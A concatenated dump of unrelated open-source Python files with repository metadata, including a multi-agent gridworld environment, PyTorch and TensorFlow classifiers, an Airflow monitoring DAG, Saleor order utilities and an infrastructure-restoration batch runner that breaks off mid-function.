Atmos Pres: {main['pressure']} hPa
""",
inline=False
)
embed.add_field(
name='Times',
value=f"""
Sunrise: {datetime.fromtimestamp(sys['sunrise'])
.strftime('%I:%M %p')}
Sunset: {datetime.fromtimestamp(sys['sunset'])
.strftime('%I:%M %p')}
""",
inline=False
)
await ctx.send(embed=embed)
def setup(bot):
bot.add_cog(APIs(bot))
| 29.622318
| 79
| 0.509997
|
7690ed18505ddeac8d56fcc790302e460cd43b4e
| 10,468
|
py
|
Python
|
MAEnv/MAS_enviroment/MAS_Checkers.py
|
Abluceli/Multi-agent-Reinforcement-Learning-Algorithms
|
15810a559e2f2cf9e5fcb158c083f9e9dd6012fc
|
[
"MIT"
] | 5
|
2020-05-25T03:08:09.000Z
|
2022-02-27T05:57:28.000Z
|
MAEnv/MAS_enviroment/MAS_Checkers.py
|
Abluceli/Multi-agent-Reinforcement-Learning-Algorithms
|
15810a559e2f2cf9e5fcb158c083f9e9dd6012fc
|
[
"MIT"
] | 1
|
2020-12-22T01:35:36.000Z
|
2022-01-28T01:51:06.000Z
|
MAEnv/MAS_enviroment/MAS_Checkers.py
|
Abluceli/Multi-agent-Reinforcement-Learning-Algorithms
|
15810a559e2f2cf9e5fcb158c083f9e9dd6012fc
|
[
"MIT"
] | 1
|
2020-05-06T01:56:55.000Z
|
2020-05-06T01:56:55.000Z
|
#!/usr/bin/env python3
# encoding=utf-8
import numpy as np
import scipy.misc
class AgentObj:
def __init__(self, coordinates, type, name, direction=0, mark=0, hidden=0):
self.x = coordinates[0]
self.y = coordinates[1]
#0: r, 1: g, 3: b
self.type = type
self.name = name
self.hidden = hidden
# 0: right, 1:top 2: left. 3: bottom
self.direction = direction
self.mark = mark
def is_hidden(self):
return self.hidden > 0
def add_mark(self, agent_hidden):
self.mark += 1
if self.mark >= 2:
self.mark = 0
self.hidden = agent_hidden
return self.mark
def sub_hidden(self):
self.hidden -= 1
self.hidden = 0 if self.hidden <=0 else self.hidden
return self.hidden
def turn_left(self, **kwargs):
self.direction = (self.direction + 1) % 4
return self.direction
def turn_right(self, **kwargs):
self.direction = (self.direction - 1 + 4) % 4
return self.direction
def move_forward_delta(self):
if self.direction == 0:
delta_x, delta_y = 1, 0
elif self.direction == 1:
delta_x, delta_y = 0, -1
elif self.direction == 2:
delta_x, delta_y = -1, 0
elif self.direction == 3:
delta_x, delta_y = 0, 1
else:
assert self.direction in range(4), 'wrong direction'
return delta_x, delta_y
def move_left_delta(self):
if self.direction == 0:
delta_x, delta_y = 0, -1
elif self.direction == 1:
delta_x, delta_y = -1, 0
elif self.direction == 2:
delta_x, delta_y = 0, 1
elif self.direction == 3:
delta_x, delta_y = 1, 0
else:
assert self.direction in range(4), 'wrong direction'
return delta_x, delta_y
def move_forward(self, env_x_size, env_y_size):
delta_x, delta_y = self.move_forward_delta()
self.x = self.x + delta_x if self.x + delta_x >=0 and self.x + delta_x <= env_x_size - 1 else self.x
self.y = self.y + delta_y if self.y + delta_y >=0 and self.y + delta_y <= env_y_size - 1 else self.y
return self.x, self.y
def move_backward(self, env_x_size, env_y_size):
forward_delta_x, forward_delta_y = self.move_forward_delta()
delta_x, delta_y = -forward_delta_x, -forward_delta_y
self.x = self.x + delta_x if self.x + delta_x >= 0 and self.x + delta_x <= env_x_size - 1 else self.x
self.y = self.y + delta_y if self.y + delta_y >= 0 and self.y + delta_y <= env_y_size - 1 else self.y
return self.x, self.y
def move_left(self, env_x_size, env_y_size):
delta_x, delta_y = self.move_left_delta()
self.x = self.x + delta_x if self.x + delta_x >= 0 and self.x + delta_x <= env_x_size - 1 else self.x
self.y = self.y + delta_y if self.y + delta_y >= 0 and self.y + delta_y <= env_y_size - 1 else self.y
return self.x, self.y
def move_right(self, env_x_size, env_y_size):
left_delta_x, left_delta_y = self.move_left_delta()
delta_x, delta_y = -left_delta_x, -left_delta_y
self.x = self.x + delta_x if self.x + delta_x >= 0 and self.x + delta_x <= env_x_size - 1 else self.x
self.y = self.y + delta_y if self.y + delta_y >= 0 and self.y + delta_y <= env_y_size - 1 else self.y
return self.x, self.y
def stay(self, **kwargs):
pass
def beam(self, env_x_size, env_y_size):
if self.direction == 0:
beam_set = [(i + 1, self.y) for i in range(self.x, env_x_size - 1)]
elif self.direction == 1:
beam_set = [(self.x, i - 1) for i in range(self.y, 0, -1)]
elif self.direction == 2:
beam_set = [(i - 1, self.y) for i in range(self.x, 0, -1)]
elif self.direction == 3:
beam_set = [(self.x, i + 1) for i in range(self.y, env_y_size - 1)]
else:
assert self.direction in range(4), 'wrong direction'
return beam_set
class FoodObj:
def __init__(self, coordinates, type=1, agent1_reward=1, agent2_reward=2):
# type: 1 is apple, 3 is lemon
self.x = coordinates[0]
self.y = coordinates[1]
self.type = type
self.agent1_reward = agent1_reward
self.agent2_reward = agent2_reward
def eat(self, agent, food_list):
food_list.remove(self)
return self.agent1_reward if agent.type == 2 else self.agent2_reward
class GameEnv:
def __init__(self, widht=18, hight=3):
self.size_x = widht
self.size_y = hight
self.objects = []
self.agent1_beam_set = []
self.agent2_beam_set = []
# 0: forward, 1: backward, 2: left, 3: right
# 4: trun lelf, 5:turn right, 6: beam, 7: stay
self.action_num = 8
self.reset()
def reset(self):
self.agent1 = AgentObj(coordinates=(16, 0), type=2, name='agent1', direction=2)
self.agent2 = AgentObj(coordinates=(16, 2), type=0, name='agent2', direction=2)
self.agent1_actions = [self.agent1.move_forward, self.agent1.move_backward, self.agent1.move_left, self.agent1.move_right,
self.agent1.turn_left, self.agent1.turn_right, self.agent1.beam, self.agent1.stay]
self.agent2_actions = [self.agent2.move_forward, self.agent2.move_backward, self.agent2.move_left, self.agent2.move_right,
self.agent2.turn_left, self.agent2.turn_right, self.agent2.beam, self.agent2.stay]
self.agent1_beam_set = []
self.agent2_beam_set = []
self.food_objects = []
for y in range(0, 3):
is_apple = (y + 1) % 2
for x in range(0, 16):
food_type = 1 if is_apple else 3
agent1_reward = 10 if is_apple else -10
agent2_reward = 1 if is_apple else -1
self.food_objects.append(FoodObj((x, y), type=food_type, agent1_reward=agent1_reward,
agent2_reward=agent2_reward))
is_apple = not is_apple
def is_done(self):
return not self.food_objects
def move(self, agent1_action, agent2_action):
assert agent1_action in range(8), 'agent1 take wrong action'
assert agent2_action in range(8), 'agent2 take wrong action'
agent1_old_x, agent1_old_y = self.agent1.x, self.agent1.y
agent2_old_x, agent2_old_y = self.agent2.x, self.agent2.y
self.agent1.sub_hidden()
self.agent2.sub_hidden()
agent1_action_return = self.agent1_actions[agent1_action](env_x_size=self.size_x, env_y_size=self.size_y)
self.agent1_beam_set = [] if agent1_action != 6 else agent1_action_return
agent2_action_return = self.agent2_actions[agent2_action](env_x_size=self.size_x, env_y_size=self.size_y)
self.agent2_beam_set = [] if agent2_action != 6 else agent2_action_return
if self.agent1.x == self.agent2.x and self.agent1.y == self.agent2.y:
self.agent1.x, self.agent1.y = agent1_old_x, agent1_old_y
self.agent2.x, self.agent2.y = agent2_old_x, agent2_old_y
agent1_reward = 0
agent2_reward = 0
for food in self.food_objects:
if food.x == self.agent1.x and food.y == self.agent1.y:
agent1_reward = food.eat(agent=self.agent1, food_list=self.food_objects)
elif food.x == self.agent2.x and food.y == self.agent2.y:
agent2_reward = food.eat(agent=self.agent2, food_list=self.food_objects)
return agent1_reward, agent2_reward
def contribute_metrix(self):
a = np.ones([self.size_y + 2, self.size_x + 2, 3])
a[:, 0, 0] = 136 / 255
a[:, 0, 1] = 138 / 255
a[:, 0, 2] = 135 / 255
a[:, self.size_x + 1, 0] = 136 / 255
a[:, self.size_x + 1, 1] = 138 / 255
a[:, self.size_x + 1, 2] = 135 / 255
a[0, :, 0] = 136 / 255
a[0, :, 1] = 138 / 255
a[0, :, 2] = 135 / 255
a[self.size_y + 1, :, 0] = 136 / 255
a[self.size_y + 1, :, 1] = 138 / 255
a[self.size_y + 1, :, 2] = 135 / 255
a[1:-1, 1:-1, :] = 0
for x, y in self.agent1_beam_set:
a[y + 1, x + 1, 0] = 0.5
a[y + 1, x + 1, 1] = 0.5
a[y + 1, x + 1, 2] = 0.5
for x, y in self.agent2_beam_set:
a[y + 1, x + 1, 0] = 0.5
a[y + 1, x + 1, 1] = 0.5
a[y + 1, x + 1, 2] = 0.5
for food in self.food_objects:
if food.type == 1: # apple
a[food.y + 1, food.x + 1, 0] = 177 / 255
a[food.y + 1, food.x + 1, 1] = 245 / 255
a[food.y + 1, food.x + 1, 2] = 90 / 255
elif food.type == 3:
a[food.y + 1, food.x + 1, 0] = 213 / 255
a[food.y + 1, food.x + 1, 1] = 144 / 255
a[food.y + 1, food.x + 1, 2] = 62 / 255
for i in range(3):
if not self.agent1.is_hidden():
delta_x, delta_y = self.agent1.move_forward_delta()
a[self.agent1.y + 1 + delta_y, self.agent1.x + 1 + delta_x, i] = 40 / 255
if not self.agent2.is_hidden():
delta_x, delta_y = self.agent2.move_forward_delta()
a[self.agent2.y + 1 + delta_y, self.agent2.x + 1 + delta_x, i] = 40 / 255
a[self.agent1.y + 1, self.agent1.x + 1, i] = 1 if i == self.agent1.type else 0
a[self.agent2.y + 1, self.agent2.x + 1, i] = 1 if i == self.agent2.type else 0
return a
def render_env(self):
a = self.contribute_metrix()
b = scipy.misc.imresize(a[:, :, 0], [10 * self.size_y, 10 * self.size_x, 1], interp='nearest')
c = scipy.misc.imresize(a[:, :, 1], [10 * self.size_y, 10 * self.size_x, 1], interp='nearest')
d = scipy.misc.imresize(a[:, :, 2], [10 * self.size_y, 10 * self.size_x, 1], interp='nearest')
a = np.stack([b, c, d], axis=2)
return a
def train_render(self):
a = self.contribute_metrix()
b = scipy.misc.imresize(a[:, :, 0], [84, 84, 1], interp='nearest')
c = scipy.misc.imresize(a[:, :, 1], [84, 84, 1], interp='nearest')
d = scipy.misc.imresize(a[:, :, 2], [84, 84, 1], interp='nearest')
a = np.stack([b, c, d], axis=2)
return a
| 38.344322
| 130
| 0.565055
|
0acc6e18d709b6905b274cbb7a2d5da4aa9ca38e
| 1,635
|
py
|
Python
|
architectures/LinearClassifier.py
|
JIAOJIAYUASD/FeatureLearningRotNet
|
6285773795b514dacb920ca172c895c3a01c68e8
|
[
"MIT"
] | 492
|
2018-03-22T01:36:52.000Z
|
2022-03-24T03:34:52.000Z
|
architectures/LinearClassifier.py
|
JIAOJIAYUASD/FeatureLearningRotNet
|
6285773795b514dacb920ca172c895c3a01c68e8
|
[
"MIT"
] | 24
|
2018-04-03T08:00:43.000Z
|
2022-01-28T02:04:27.000Z
|
architectures/LinearClassifier.py
|
JIAOJIAYUASD/FeatureLearningRotNet
|
6285773795b514dacb920ca172c895c3a01c68e8
|
[
"MIT"
] | 129
|
2018-03-27T09:59:37.000Z
|
2022-02-28T06:35:56.000Z
|
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
class Flatten(nn.Module):
def __init__(self):
super(Flatten, self).__init__()
def forward(self, feat):
return feat.view(feat.size(0), -1)
class Classifier(nn.Module):
def __init__(self, opt):
super(Classifier, self).__init__()
nChannels = opt['nChannels']
num_classes = opt['num_classes']
pool_size = opt['pool_size']
pool_type = opt['pool_type'] if ('pool_type' in opt) else 'max'
nChannelsAll = nChannels * pool_size * pool_size
self.classifier = nn.Sequential()
if pool_type == 'max':
self.classifier.add_module('MaxPool', nn.AdaptiveMaxPool2d((pool_size, pool_size)))
elif pool_type == 'avg':
self.classifier.add_module('AvgPool', nn.AdaptiveAvgPool2d((pool_size, pool_size)))
self.classifier.add_module('BatchNorm', nn.BatchNorm2d(nChannels, affine=False))
self.classifier.add_module('Flatten', Flatten())
self.classifier.add_module('LiniearClassifier', nn.Linear(nChannelsAll, num_classes))
self.initilize()
def forward(self, feat):
return self.classifier(feat)
def initilize(self):
for m in self.modules():
if isinstance(m, nn.Linear):
fin = m.in_features
fout = m.out_features
std_val = np.sqrt(2.0/fout)
m.weight.data.normal_(0.0, std_val)
if m.bias is not None:
m.bias.data.fill_(0.0)
def create_model(opt):
return Classifier(opt)
| 34.0625
| 95
| 0.625076
|
157de86317033bd89563d287db2c0beb89bbfc30
| 2,037
|
py
|
Python
|
sample.py
|
ShiriBernat/FlyFiles
|
1fe01faaa9951a3f006ab5b87dc3773d8e0e3817
|
[
"MIT"
] | null | null | null |
sample.py
|
ShiriBernat/FlyFiles
|
1fe01faaa9951a3f006ab5b87dc3773d8e0e3817
|
[
"MIT"
] | null | null | null |
sample.py
|
ShiriBernat/FlyFiles
|
1fe01faaa9951a3f006ab5b87dc3773d8e0e3817
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import tensorflow as tf
import argparse
import utils
def main():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--checkpoint_dir', type=str, default='save',
help='model directory to store checkpointed models')
parser.add_argument('--text', type=str, default=u' ',
help='prime text')
args = parser.parse_args()
sample(args)
def sample(args):
print('Loading data')
positive_data_file = "./pos.txt"
negative_data_file = "./neg.txt"
x, y, vocabulary, vocabulary_inv = utils.load_data(positive_data_file, negative_data_file)
text = [list(args.text)]
sentences_padded = utils.pad_sentences(text, maxlen=x.shape[1])
raw_x, dummy_y = utils.build_input_data(sentences_padded, [0], vocabulary)
checkpoint_file = tf.train.latest_checkpoint(args.checkpoint_dir)
graph = tf.Graph()
with graph.as_default():
sess = tf.Session()
with sess.as_default():
# Load the saved meta graph and restore variables
saver = tf.train.import_meta_graph("{}.meta".format(checkpoint_file))
saver.restore(sess, checkpoint_file)
# Get the placeholders from the graph by name
input_x = graph.get_operation_by_name("input_x").outputs[0]
# input_y = graph.get_operation_by_name("input_y").outputs[0]
dropout_keep_prob = graph.get_operation_by_name("dropout_keep_prob").outputs[0]
# Tensors we want to evaluate
predictions = graph.get_operation_by_name("output/predictions").outputs[0]
predicted_result = sess.run(predictions, {input_x: raw_x, dropout_keep_prob: 1.0})
if (predicted_result[0] == 1):
print(args.text + ": other")
else:
print(args.text + ": computer science")
if __name__ == '__main__':
main()
| 37.036364
| 95
| 0.628866
|
e0739dabc9a7ec366fa6f4841376a8b736c45dbd
| 2,332
|
py
|
Python
|
footprint_airflow/dags/footprint_monitor_dag.py
|
footprint-network/footprint-analytics
|
5de4932ce1c21860785edcce90ffdf097b6f9921
|
[
"MIT"
] | null | null | null |
footprint_airflow/dags/footprint_monitor_dag.py
|
footprint-network/footprint-analytics
|
5de4932ce1c21860785edcce90ffdf097b6f9921
|
[
"MIT"
] | null | null | null |
footprint_airflow/dags/footprint_monitor_dag.py
|
footprint-network/footprint-analytics
|
5de4932ce1c21860785edcce90ffdf097b6f9921
|
[
"MIT"
] | 1
|
2021-09-20T22:31:20.000Z
|
2021-09-20T22:31:20.000Z
|
from models import MonitorDashBoard
from utils.date_util import DateUtil
from utils import Constant
from datetime import datetime, timedelta
from utils.monitor import send_to_slack
import pydash
from utils.build_dag_util import BuildDAG
def python_callable():
get_task_execution_result()
def get_execution_date():
return DateUtil.utc_start_of_date(DateUtil.utc_x_hours_ago(24 * 1))
def get_task_execution_result():
execution_date = get_execution_date()
regular_query = {
'stats_date': execution_date,
'rule_name': Constant.DASH_BOARD_RULE_NAME['TASK_EXECUTION'],
'result_code': Constant.DASH_BOARD_RESULT_CODE['REGULAR']
}
regular_result = MonitorDashBoard.distinct('task_name', regular_query)
regular_count = len(regular_result)
exception_query = {
'stats_date': execution_date,
'rule_name': Constant.DASH_BOARD_RULE_NAME['TASK_EXECUTION'],
'result_code': Constant.DASH_BOARD_RESULT_CODE['EXCEPTION']
}
exception_result = MonitorDashBoard.distinct('task_name', exception_query)
exception_count = len(exception_result)
execution_date_str = datetime.strftime(execution_date, '%Y-%m-%d')
exception_detail = pydash.join(exception_result, '、')
print(exception_detail)
text = f'UTC Time: {execution_date_str} The task execution monitoring result is: the number of tasks executed normally: {regular_count}, Number of abnormal task execution: {exception_count}'
if exception_count > 0:
text = text + 'Details of abnormal tasks are as follows\n {exception_detail}'.format(exception_detail=exception_detail)
send_to_slack(text)
default_dag_args = {
'owner': 'airflow',
'depends_on_past': False,
'retries': 1,
'retry_delay': timedelta(minutes=5),
'start_date': datetime(2021, 7, 1)
}
dag_params = {
"dag_id": "footprint_monitor",
"catchup": False,
"schedule_interval": '0 3 * * *',
"description": "footprint_monitor dag",
"default_args": default_dag_args,
"dagrun_timeout": timedelta(hours=1)
}
dag_task_params = [
{
"task_id": "send_monitor_dash_board_result",
"python_callable": python_callable,
"execution_timeout": timedelta(hours=1)
}
]
DAG = BuildDAG().build_dag(dag_params=dag_params, dag_task_params=dag_task_params)
| 31.093333
| 194
| 0.726415
|
5bd7f09866cd7ed8a37997976e2eb3a90999101b
| 7,304
|
py
|
Python
|
saleor/order/utils.py
|
skazancev/saleor
|
42746ba00080ce36dedc0954be66b42f0e0a7499
|
[
"BSD-3-Clause"
] | 1
|
2020-02-13T21:53:14.000Z
|
2020-02-13T21:53:14.000Z
|
saleor/order/utils.py
|
skazancev/saleor
|
42746ba00080ce36dedc0954be66b42f0e0a7499
|
[
"BSD-3-Clause"
] | null | null | null |
saleor/order/utils.py
|
skazancev/saleor
|
42746ba00080ce36dedc0954be66b42f0e0a7499
|
[
"BSD-3-Clause"
] | null | null | null |
from functools import wraps
from django.conf import settings
from django.db.models import F
from django.shortcuts import get_object_or_404, redirect
from django.utils.translation import pgettext_lazy
from prices import Money, TaxedMoney, fixed_discount
from . import GroupStatus
from ..account.utils import store_user_address
from ..core.exceptions import InsufficientStock
from ..core.utils import ZERO_TAXED_MONEY
from ..product.utils import allocate_stock
def check_order_status(func):
"""Prevent execution of decorated function if order is fully paid.
Instead redirects to order details page.
"""
# pylint: disable=cyclic-import
from .models import Order
@wraps(func)
def decorator(*args, **kwargs):
token = kwargs.pop('token')
order = get_object_or_404(Order, token=token)
if order.is_fully_paid():
return redirect('order:details', token=order.token)
kwargs['order'] = order
return func(*args, **kwargs)
return decorator
def cancel_order(order):
"""Cancel order by cancelling all associated shipment groups."""
for group in order.groups.all():
group.cancel()
group.save()
def recalculate_order(order):
"""Recalculate and assign total price of order.
Total price is a sum of items in shipment groups and order shipping price
minus discount amount.
"""
prices = [
group.get_total() for group in order
if group.status != GroupStatus.CANCELLED]
total = sum(prices, order.shipping_price)
if order.discount_amount:
total -= order.discount_amount
order.total = total
order.save()
def attach_order_to_user(order, user):
"""Associates existing order with user account."""
order.user = user
store_user_address(user, order.billing_address, billing=True)
if order.shipping_address:
store_user_address(user, order.shipping_address, shipping=True)
order.save(update_fields=['user'])
def add_variant_to_delivery_group(
group, variant, total_quantity, discounts=None, add_to_existing=True):
"""Add total_quantity of variant to group.
Raises InsufficientStock exception if quantity could not be fulfilled.
By default, first adds variant to existing lines with same variant.
It can be disabled with setting add_to_existing to False.
Order lines are created by increasing quantity of lines,
as long as total_quantity of variant will be added.
"""
quantity_left = (
add_variant_to_existing_lines(group, variant, total_quantity)
if add_to_existing else total_quantity)
price = variant.get_price_per_item(discounts)
while quantity_left > 0:
stock = variant.select_stockrecord()
if not stock:
raise InsufficientStock(variant)
quantity = (
stock.quantity_available
if quantity_left > stock.quantity_available
else quantity_left
)
group.lines.create(
product=variant.product,
product_name=variant.display_product(),
product_sku=variant.sku,
is_shipping_required=(
variant.product.product_type.is_shipping_required),
quantity=quantity,
unit_price=price,
stock=stock,
stock_location=stock.location.name)
allocate_stock(stock, quantity)
# refresh stock for accessing quantity_allocated
stock.refresh_from_db()
quantity_left -= quantity
def add_variant_to_existing_lines(group, variant, total_quantity):
"""Add variant to existing lines with same variant.
Variant is added by increasing quantity of lines with same variant,
as long as total_quantity of variant will be added
or there is no more lines with same variant.
Returns quantity that could not be fulfilled with existing lines.
"""
# order descending by lines' stock available quantity
lines = group.lines.filter(
product=variant.product, product_sku=variant.sku,
stock__isnull=False).order_by(
F('stock__quantity_allocated') - F('stock__quantity'))
quantity_left = total_quantity
for line in lines:
quantity = (
line.stock.quantity_available
if quantity_left > line.stock.quantity_available
else quantity_left)
line.quantity += quantity
line.save()
allocate_stock(line.stock, quantity)
quantity_left -= quantity
if quantity_left == 0:
break
return quantity_left
def merge_duplicates_into_order_line(line):
"""Merge duplicated lines in shipment group into one (given) line.
If there are no duplicates, nothing will happen.
"""
lines = line.delivery_group.lines.filter(
product=line.product, product_name=line.product_name,
product_sku=line.product_sku, stock=line.stock,
is_shipping_required=line.is_shipping_required)
if lines.count() > 1:
line.quantity = sum([line.quantity for line in lines])
line.save()
lines.exclude(pk=line.pk).delete()
def change_order_line_quantity(line, new_quantity):
"""Change the quantity of ordered items in a order line."""
line.quantity = new_quantity
line.save()
if not line.delivery_group.get_total_quantity():
line.delivery_group.delete()
order = line.delivery_group.order
if not order.get_lines():
order.history.create(
content=pgettext_lazy(
'Order status history entry',
'Order cancelled. No items in order'))
def remove_empty_groups(line, force=False):
"""Remove order line and associated shipment group and order.
Remove is done only if quantity of order line or items in group or in order
is equal to 0.
"""
source_group = line.delivery_group
order = source_group.order
if line.quantity:
line.save()
else:
line.delete()
if not source_group.get_total_quantity() or force:
source_group.delete()
if not order.get_lines():
order.history.create(
content=pgettext_lazy(
'Order status history entry',
'Order cancelled. No items in order'))
def move_order_line_to_group(line, target_group, quantity):
from .models import OrderLine
"""Split given quantity of order line to another shipment group."""
try:
target_line = target_group.lines.get(
product=line.product, product_name=line.product_name,
product_sku=line.product_sku, stock=line.stock,
is_shipping_required=line.is_shipping_required)
except OrderLine.DoesNotExist:
target_group.lines.create(
delivery_group=target_group, product=line.product,
product_name=line.product_name, product_sku=line.product_sku,
is_shipping_required=line.is_shipping_required,
quantity=quantity, unit_price_net=line.unit_price_net,
stock=line.stock,
stock_location=line.stock_location,
unit_price_gross=line.unit_price_gross)
else:
target_line.quantity += quantity
target_line.save()
line.quantity -= quantity
remove_empty_groups(line)
| 34.45283
| 79
| 0.681407
|
f3c4236e402508fc3d9d030329fdfc25677bfe5b
| 547
|
py
|
Python
|
www/migrations/0001_initial.py
|
rainum/dontcrashmydrone
|
1c99536a9798c18951edd8626b0299e48e05f4e5
|
[
"MIT"
] | null | null | null |
www/migrations/0001_initial.py
|
rainum/dontcrashmydrone
|
1c99536a9798c18951edd8626b0299e48e05f4e5
|
[
"MIT"
] | null | null | null |
www/migrations/0001_initial.py
|
rainum/dontcrashmydrone
|
1c99536a9798c18951edd8626b0299e48e05f4e5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-04-23 11:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Token',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('token', models.TextField(unique=True)),
],
),
]
| 22.791667
| 114
| 0.588665
|
11e33bfa4c8046a51b99c80e8e5c51d7576bf97e
| 270
|
py
|
Python
|
matplotlib/line001.py
|
bismog/leetcode
|
13b8a77045f96e7c59ddfe287481f6aaa68e564d
|
[
"MIT"
] | null | null | null |
matplotlib/line001.py
|
bismog/leetcode
|
13b8a77045f96e7c59ddfe287481f6aaa68e564d
|
[
"MIT"
] | null | null | null |
matplotlib/line001.py
|
bismog/leetcode
|
13b8a77045f96e7c59ddfe287481f6aaa68e564d
|
[
"MIT"
] | 1
|
2018-08-17T07:07:15.000Z
|
2018-08-17T07:07:15.000Z
|
#!/usr/bin/env python
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
plt.style.use('classic')
#Plotting to our canvas
fig = plt.figure()
plt.plot([1,2,3],[4,5,1])
fig.savefig('/home/tmp/line001.png')
#Showing what we plotted
# plt.show()
| 18
| 38
| 0.696296
|
03f25c51e154375a241fdaa6b67bc7844900c4d8
| 24,856
|
py
|
Python
|
codes/Archive/run_main_no_game.py
|
htalebiyan/Dec2py
|
8c4181eb92d6e52aef8cc804c485865516cee200
|
[
"MIT"
] | null | null | null |
codes/Archive/run_main_no_game.py
|
htalebiyan/Dec2py
|
8c4181eb92d6e52aef8cc804c485865516cee200
|
[
"MIT"
] | null | null | null |
codes/Archive/run_main_no_game.py
|
htalebiyan/Dec2py
|
8c4181eb92d6e52aef8cc804c485865516cee200
|
[
"MIT"
] | null | null | null |
""" Runs INDP, td-INDP, Judgment Call, and infrastructure games"""
import sys
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import pickle
import indp
import dindputils
import plots
import gametree
import itertools
import Metaheuristics.metaheuristics as mh
# import gameutils
try:
# Change the current working Directory
DIR_MAIN = 'C:/Users/ht20/Documents/GitHub/td-DINDP/pyindp'
os.chdir(DIR_MAIN)
print("Directory changed to "+DIR_MAIN)
except OSError:
print("Can't change the Current Working Directory")
def batch_run(params, fail_sce_param, player_ordering=[3, 1]):
'''
Batch run different methods for a given list of damage scenarios,
given global parameters.
Parameters
----------
params : dict
DESCRIPTION.
fail_sce_param : dict
DESCRIPTION.
player_ordering : list, optional
DESCRIPTION. The default is [3, 1].
Returns
-------
None. Writes to file
'''
# Set root directories
base_dir = fail_sce_param['BASE_DIR']
damage_dir = fail_sce_param['DAMAGE_DIR']
topology = None
infrastructure_data = None
ext_interdependency = None
if fail_sce_param['TYPE'] == 'Andres':
infrastructure_data = 'shelby_old'
ext_interdependency = "../data/INDP_4-12-2016"
elif fail_sce_param['TYPE'] == 'WU':
infrastructure_data = 'shelby_extended'
if fail_sce_param['FILTER_SCE'] is not None:
list_high_dam = pd.read_csv(fail_sce_param['FILTER_SCE'])
elif fail_sce_param['TYPE'] == 'random':
infrastructure_data = 'shelby_extended'
elif fail_sce_param['TYPE'] == 'synthetic':
topology = fail_sce_param['TOPO']
print('----Running for resources: '+str(params['V']))
for m in fail_sce_param['MAGS']:
for i in fail_sce_param['SAMPLE_RANGE']:
try:
list_high_dam
if len(list_high_dam.loc[(list_high_dam.set == i)&\
(list_high_dam.sce == m)].index) == 0:
continue
except NameError:
pass
print('---Running Magnitude '+str(m)+' sample '+str(i)+'...')
print("Initializing network...")
if infrastructure_data:
params["N"], _, _ = indp.initialize_network(BASE_DIR=base_dir,
external_interdependency_dir=ext_interdependency,
sim_number=0, magnitude=6, sample=0, v=params["V"],
infrastructure_data=infrastructure_data)
else:
params["N"], params["V"], params['L'] = indp.initialize_network(BASE_DIR=base_dir,
external_interdependency_dir=ext_interdependency,
magnitude=m, sample=i, infrastructure_data=infrastructure_data,
topology=topology)
params["SIM_NUMBER"] = i
params["MAGNITUDE"] = m
# Check if the results exist
output_dir_full = ''
if params["ALGORITHM"] in ["INDP"]:
output_dir_full = params["OUTPUT_DIR"]+'_L'+str(len(params["L"]))+'_m'+\
str(params["MAGNITUDE"])+"_v"+str(params["V"])+'/actions_'+str(i)+'_.csv'
if os.path.exists(output_dir_full):
print('results are already there\n')
continue
if fail_sce_param['TYPE'] == 'WU':
indp.add_Wu_failure_scenario(params["N"], DAM_DIR=damage_dir,
noSet=i, noSce=m)
elif fail_sce_param['TYPE'] == 'ANDRES':
indp.add_failure_scenario(params["N"], DAM_DIR=damage_dir,
magnitude=m, v=params["V"], sim_number=i)
elif fail_sce_param['TYPE'] == 'random':
indp.add_random_failure_scenario(params["N"], DAM_DIR=damage_dir,
sample=i)
elif fail_sce_param['TYPE'] == 'synthetic':
indp.add_synthetic_failure_scenario(params["N"], DAM_DIR=base_dir,
topology=topology, config=m, sample=i)
if params["ALGORITHM"] == "INDP":
indp.run_indp(params, layers=params['L'], controlled_layers=params['L'], T=params["T"], saveModel=False,
print_cmd_line=False, co_location=True)
if params["ALGORITHM"] == "MH":
mh.run_mh(params, validate=False, T=params["T"], layers=params['L'],
controlled_layers=params['L'], saveModel=True, print_cmd_line=False,
co_location=True)
elif params["ALGORITHM"] == "INFO_SHARE":
indp.run_info_share(params, layers=params['L'], T=params["T"])
elif params["ALGORITHM"] == "INRG":
indp.run_inrg(params, layers=params['L'], player_ordering=player_ordering)
elif params["ALGORITHM"] == "BACKWARDS_INDUCTION":
gametree.run_backwards_induction(params["N"], i, players=params['L'],
player_ordering=player_ordering,
T=params["T"], outdir=params["OUTPUT_DIR"])
elif params["ALGORITHM"] == "JC":
dindputils.run_judgment_call(params, save_jc_model=True, print_cmd=False)
elif params["ALGORITHM"] in ["NORMALGAME", "BAYESGAME"]:
gameutils.run_game(params, save_results=True, print_cmd=False,
save_model=False, plot2D=False) #!!!
def run_indp_sample(layers):
interdep_net= indp.initialize_sample_network(layers=layers)
params={"NUM_ITERATIONS":7, "OUTPUT_DIR":'../results/indp_sample_12Node_results',
"V":len(layers), "T":1, "L":layers, "WINDOW_LENGTH":1, "ALGORITHM":"INDP",
"N":interdep_net, "MAGNITUDE":0, "SIM_NUMBER":0}
indp.run_indp(params, layers=layers, T=params["T"], suffix="", saveModel=True, print_cmd_line=True)
print('\n\nPlot restoration plan by INDP')
indp.plot_indp_sample(params)
plt.show()
def run_tdindp_sample(layers):
interdep_net= indp.initialize_sample_network(layers=layers)
params={"OUTPUT_DIR":'../results/tdindp_sample_12Node_results', "V":len(layers),
"T":7, "L":layers, "ALGORITHM":"INDP", "WINDOW_LENGTH":3,
"N":interdep_net, "MAGNITUDE":0, "SIM_NUMBER":0} #"WINDOW_LENGTH":6,
indp.run_indp(params, layers=layers, T=params["T"], suffix="", saveModel=True, print_cmd_line=True)
print('\n\nPlot restoration plan by INDP')
indp.plot_indp_sample(params)
plt.show()
def run_jc_sample(layers, judge_types, auction_type, valuation_type):
interdep_net=indp.initialize_sample_network(layers=layers)
params={"NUM_ITERATIONS":7, "OUTPUT_DIR":'../results/jc_sample_12Node_results',
"V":len(layers), "T":1, "L":layers, "WINDOW_LENGTH":1, "ALGORITHM":"JC",
"N":interdep_net, "MAGNITUDE":0, "SIM_NUMBER":0,
